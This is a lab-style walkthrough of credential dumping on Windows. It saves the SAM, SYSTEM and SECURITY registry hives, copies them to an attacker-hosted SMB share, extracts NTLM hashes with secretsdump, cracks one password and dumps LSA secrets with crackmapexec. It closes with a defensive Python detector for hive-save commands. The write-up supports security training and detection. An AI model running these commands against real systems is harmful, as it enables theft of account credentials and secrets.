Attacking SAM

June 05, 2024

First, we save the SAM, SYSTEM, and SECURITY registry hives from HKLM:

reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

Then, on the attacker machine, we create a directory to receive the transferred files.

We also specify the name of the SMB share. Any name will do; I named it "SamData".

mkdir TryShare
sudo impacket-smbserver -smb2support SamData TryShare

After that, we move the saved hive files we created earlier to the share on the attacker machine.

move sam.save \\10.10.15.238\SamData
move security.save \\10.10.15.238\SamData
move system.save \\10.10.15.238\SamData

We can see that the files are here.

Then we can extract the data from the SAM database, since system.save contains the boot key needed to decrypt it:

sudo impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

The password behind the NTLM hash of user ITbackdoor is pretty simple, so an online hash lookup is enough to recover it.

User - ITbackdoor

c02478537b9727d391bc80011c2e2321:matrix

Then dump the LSA secrets over SMB:

# Dumps the LSA secrets
poetry run crackmapexec smb 10.129.202.137 --local-auth -u ITbackdoor -p matrix --lsa
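
On the detection side, the reg.exe save step at the start of this chain is what shows up most clearly in process-creation logs (Sysmon Event ID 1 or Security Event ID 4688 with command-line logging enabled). The following Python is an added example, not part of the original write-up; the function names, hosts, users and event tuples are constructed for illustration.

```python
import re
import shlex
from collections import defaultdict

HIVES = {"sam", "system", "security"}
ROOTS = {"hklm", "hkey_local_machine"}

def hive_saved(cmdline):
    """Return the hive ('sam', 'system', 'security') a 'reg save' command targets, else None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes
    except ValueError:                            # unbalanced quotes: fall back to whitespace
        argv = cmdline.split()
    argv = [a.strip('"').lower() for a in argv]
    if len(argv) < 3 or re.split(r"[\\/]", argv[0])[-1] not in ("reg", "reg.exe"):
        return None
    if argv[1] != "save":
        return None
    root, _, sub = argv[2].rstrip("\\").partition("\\")
    # Match only the hive root (hklm\sam), not deeper subkeys, to limit noise.
    return sub if root in ROOTS and sub in HIVES else None

def find_hive_dumps(events):
    """events: (host, user, cmdline) tuples. Return {(host, user): hives} for actors
    that saved both SAM and SYSTEM, the pair needed to extract hashes offline."""
    seen = defaultdict(set)
    for host, user, cmdline in events:
        hive = hive_saved(cmdline)
        if hive:
            seen[(host, user)].add(hive)
    return {actor: hives for actor, hives in seen.items() if {"sam", "system"} <= hives}

# Constructed sample process-creation records (host, user, command line).
SAMPLE_EVENTS = [
    ("WS01", "bob", r"reg.exe save hklm\sam C:\sam.save"),
    ("WS01", "bob", r"reg.exe save hklm\system C:\system.save"),
    ("WS01", "bob", r"reg.exe save hklm\security C:\security.save"),
    ("WS02", "admin", r"reg export HKLM\Software\ExampleVendor C:\backup\app.reg"),
    ("WS03", "svc", r"reg save HKLM\SYSTEM D:\backup\system.hiv"),
    ("WS04", "eve", r'"C:\Windows\System32\reg.exe" SAVE HKEY_LOCAL_MACHINE\SAM "C:\Temp\a b.dat"'),
    ("WS04", "eve", r"C:\Windows\System32\reg.exe save HKLM\System\ C:\Temp\s.dat"),
]

if __name__ == "__main__":
    for (host, user), hives in find_hive_dumps(SAMPLE_EVENTS).items():
        print(f"ALERT {host} {user}: saved hives {sorted(hives)}")
```

A single SYSTEM hive backup (WS03) does not alert on its own; the rule fires only when the same user on the same host also saves SAM.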
